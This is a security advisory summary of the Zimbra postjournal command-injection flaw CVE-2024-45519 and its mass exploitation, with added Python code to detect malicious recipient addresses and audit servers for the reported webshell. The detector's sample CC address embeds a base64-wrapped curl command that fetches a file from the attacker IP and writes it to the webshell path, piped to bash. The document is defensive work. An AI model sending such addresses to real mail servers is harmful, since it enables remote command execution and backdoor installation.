Summary:

- Critical Vulnerability Discovered
Researchers have identified a critical vulnerability, CVE-2024-45519, in Zimbra Collaboration mail servers. It lets a remote, unauthenticated attacker execute arbitrary commands on the server, and in-the-wild exploitation has already been used to install a backdoor on affected systems.
- Exploitation Details
The flaw is in Zimbra's postjournal service, which is disabled by default and only runs if an administrator enables it manually. When it is enabled, an attacker needs nothing more than to send a specially crafted email to an address hosted on the server: postjournal hands recipient addresses from the message to a shell without sanitising them, so shell commands embedded in an address are executed on the server with the privileges of the Zimbra service.
- Mass Exploitation Reported
Security researcher Ivan Kwiatkowski reported ongoing mass exploitation of the vulnerability. The malicious emails originated from the IP address 79.124.49[.]86, and their payloads attempted to download and run files using the curl tool.
- Malicious Email Tactics
The attackers placed their payload in the CC addresses of the message: each address carried a base64-encoded command which, once decoded and executed, wrote a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp on vulnerable Zimbra servers. The webshell waits for incoming HTTP requests and executes commands carried in the request's cookies, so a compromised server keeps serving the attacker even after the original email has been processed.
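The following detector is an added example written for this summary, not code from the researchers or from Zimbra. It scans recipient addresses for the pattern described above: shell command substitution in the local-part wrapping a base64-encoded stage, which it decodes and checks against the indicators reported for this campaign (the webshell path, the source IP, and curl). The exact shape of the malicious address, the regular expressions, and the sample addresses are assumptions built for illustration; the base64 payload is constructed inline, not captured from real traffic.

```python
import base64
import re
from dataclasses import dataclass, field

# Assumed patterns (illustration only): a shell command substitution inside the
# local-part of an address, and an "echo <base64> | base64 -d" stage inside it.
SUBSTITUTION_RE = re.compile(r"\$\(([^)]*)\)|`([^`]*)`")
B64_STAGE_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
)
SHELL_META = set("$`|;&<>")

# Strings worth flagging in a decoded payload: the webshell path and source IP
# reported for this campaign, plus curl as a generic download-stage tell.
INDICATORS = (
    "/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp",
    "79.124.49.86",
    "curl",
)


@dataclass
class Finding:
    address: str
    reason: str
    decoded: str = ""
    matched: list = field(default_factory=list)


def local_part(address):
    """Return the local-part of an address, stripping <> and an outer quoted form."""
    addr = address.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    local, _, _domain = addr.rpartition("@")
    if len(local) >= 2 and local[0] == local[-1] == '"':
        local = local[1:-1]
    return local


def inspect_address(address):
    """Return a Finding if the local-part looks like a command injection attempt, else None."""
    local = local_part(address)
    if not SHELL_META.intersection(local):
        return None
    finding = Finding(address=address, reason="shell metacharacters in local-part")
    for m in SUBSTITUTION_RE.finditer(local):
        cmd = m.group(1) or m.group(2) or ""
        finding.reason = "command substitution in local-part"
        stage = B64_STAGE_RE.search(cmd)
        if stage:
            try:
                raw = base64.b64decode(stage.group(1), validate=True)
                finding.decoded = raw.decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                finding.decoded = "<undecodable base64>"
    haystack = local + " " + finding.decoded
    finding.matched = [i for i in INDICATORS if i in haystack]
    return finding


def scan_recipients(addresses):
    """Inspect every recipient address and return the list of findings."""
    return [f for f in (inspect_address(a) for a in addresses) if f is not None]


# Constructed sample (not captured traffic): two benign recipients and one CC
# entry shaped like the reported abuse, carrying a base64-wrapped stage that
# would fetch a file with curl and write it to the webshell path cited above.
_STAGE = (
    "curl -s http://79.124.49.86/x "
    "-o /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp"
).encode()
SAMPLE_CC = [
    "alice@example.test",
    "<bob@example.test>",
    '"aabbb$(echo ' + base64.b64encode(_STAGE).decode() + ' | base64 -d | bash)"@example.test',
]

if __name__ == "__main__":
    for f in scan_recipients(SAMPLE_CC):
        print(f.reason, "->", f.address)
        print("  decoded:", f.decoded)
        print("  indicators:", f.matched)
```

The same function can be pointed at RCPT TO values pulled from Postfix logs or at the To/CC headers of quarantined messages; any hit on "command substitution in local-part" is worth escalating even when the decoded payload matches none of the listed indicators, since a legitimate mailbox name never contains `$(`.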
- Recommended Actions
Zimbra has released patches for this vulnerability, and all administrators are urged to apply them. At a minimum, anyone who cannot patch immediately should ensure that the postjournal service is disabled. Because exploitation has already been observed, patched and unpatched servers alike should be checked for an unexpected zimbraConfig.jsp at the path above; its presence means the server was compromised before the fix was applied and needs incident response, not just the patch.
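The following audit helper is an added example for this summary, not a Zimbra tool. Given an install root and the text output of a local-config query, it reports whether postjournal is enabled and whether the reported webshell file exists. It assumes the `key = value` line format of Zimbra's `zmlocalconfig` output and the key name `postjournal_enabled`; both are assumptions, and the demo builds throwaway directory trees in a temp directory rather than touching a real /opt/zimbra.

```python
import tempfile
from pathlib import Path

# Reported webshell location, relative to the Zimbra install root (e.g. /opt/zimbra).
WEBSHELL_REL = Path("jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp")


def postjournal_enabled(localconfig_output):
    """Parse 'key = value' lines (zmlocalconfig format assumed) and return True
    only if postjournal_enabled is explicitly set to a true value."""
    for line in localconfig_output.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "postjournal_enabled":
            return value.strip().strip('"').lower() in ("true", "1", "yes")
    return False  # postjournal is off by default; an absent key means disabled


def audit_zimbra_root(root, localconfig_output):
    """Return a dict describing the postjournal setting and webshell presence under root."""
    root = Path(root)
    shell = root / WEBSHELL_REL
    result = {
        "postjournal_enabled": postjournal_enabled(localconfig_output),
        "webshell_present": shell.is_file(),
        "webshell_path": str(shell),
    }
    if result["webshell_present"]:
        st = shell.stat()
        # Size and mtime help scope the incident: the mtime bounds the compromise time.
        result["webshell_size"] = st.st_size
        result["webshell_mtime"] = st.st_mtime
    return result


def demo():
    """Audit two constructed install trees: one clean, one carrying a placeholder
    file at the webshell path (a comment, not a real webshell)."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp) / "clean"
        infected = Path(tmp) / "infected"
        clean.mkdir()
        (infected / WEBSHELL_REL).parent.mkdir(parents=True)
        (infected / WEBSHELL_REL).write_text("<%-- constructed placeholder --%>\n")
        return {
            "clean": audit_zimbra_root(clean, "postjournal_enabled = false\n"),
            "infected": audit_zimbra_root(infected, "postjournal_enabled = true\n"),
        }


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, report)
```

On a real host the second argument would be the output of the local-config query run as the zimbra user, and a present webshell should be preserved (copied with its metadata) before removal so the access logs around its mtime can be reviewed.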
Read more at: Ars Technica | Zimbra Security Advisories